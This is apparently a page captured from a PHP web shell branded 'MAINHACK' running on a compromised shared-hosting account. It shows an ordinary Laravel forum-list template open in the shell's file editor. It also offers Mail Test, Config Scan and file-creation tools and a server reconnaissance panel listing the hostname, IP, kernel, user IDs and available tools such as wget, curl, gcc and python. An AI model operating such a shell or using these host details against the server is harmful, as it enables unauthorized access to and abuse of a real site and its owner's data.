[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: 287fb813416f0bd0ee33e6094605732aff820966.php
<?php if(!empty($forumTopics) and !$forumTopics->isEmpty()): ?> <div class="px-15 py-20"> <?php $__currentLoopData = $forumTopics; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $topic): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <div class="topics-lists-card row align-items-center py-10"> <div class="col-12 col-md-6"> <div class="d-flex align-items-center"> <div class="topic-user-avatar rounded-circle"> <img src="<?php echo e($user->getAvatar()); ?>" class="img-cover rounded-circle" alt="<?php echo e($user->full_name); ?>"> </div> <div class="ml-10 mw-100"> <a href="<?php echo e($topic->getPostsUrl()); ?>" class=""> <h4 class="font-16 font-weight-bold text-secondary text-ellipsis"><?php echo e($topic->title); ?></h4> </a> <span class="d-block font-14 text-gray"><?php echo e(trans('public.by')); ?> <?php echo e($user->full_name); ?> <?php echo e(trans('public.in')); ?> <?php echo e(dateTimeFormat($topic->created_at,'j M Y | H:i')); ?></span> </div> </div> </div> <div class="col-12 col-md-6"> <div class="row"> <div class="col-3 text-center"> <span class="d-block font-14 text-gray font-weight-bold"><?php echo e($topic->posts_count); ?></span> <span class="d-block font-12 text-gray"><?php echo e(trans('site.posts')); ?></span> </div> <div class="col-3 d-flex align-items-center"> <?php if($topic->pin): ?> <div class="topics-lists-card__icons rounded-circle mr-10"> <img src="/assets/default/img/learning/un_pin.svg" alt="" class="img-cover rounded-circle"> </div> <?php endif; ?> <?php if($topic->close): ?> <div class="topics-lists-card__icons rounded-circle"> <img src="/assets/default/img/learning/lock.svg" alt="" class="img-cover rounded-circle"> </div> <?php endif; ?> </div> <div class="col-12 col-md-6"> <?php if(!empty($topic->lastPost)): ?> <div class="d-flex align-items-center"> <div class="topic-last-post-user-avatar rounded-circle"> <img src="<?php echo e($topic->lastPost->user->getAvatar(30)); ?>" class="img-cover rounded-circle" alt="<?php echo e($topic->lastPost->user->full_name); ?>"> </div> <div class="ml-10"> <h4 class="font-14 font-weight-500 text-gray"><?php echo e($topic->lastPost->user->full_name); ?></h4> <span class="d-block font-12 font-weight-500 text-gray"><?php echo e(trans('public.in')); ?> <?php echo e(dateTimeFormat($topic->lastPost->created_at,'j M Y | H:i')); ?></span> </div> </div> <?php endif; ?> </div> </div> </div> </div> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> </div> <?php else: ?> <?php echo $__env->make(getTemplate() . '.includes.no-result',[ 'file_name' => 'webinar.png', 'title' => trans('update.instructor_not_have_topics'), 'hint' => '', ], \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?> <?php endif; ?> <?php /**PATH /home/aoneqssk/public_html/resources/views/web/default/user/profile_tabs/forum.blade.php ENDPATH**/ ?>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium320.web-hosting.com
Server IP: 66.29.153.54
PHP Version: 8.2.29
Server Software: LiteSpeed
System: Linux premium320.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.85 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: aoneqssk
User ID (UID): 1285
Group ID (GID): 1290
Script Owner UID: 1285
Current Dir Owner: 1285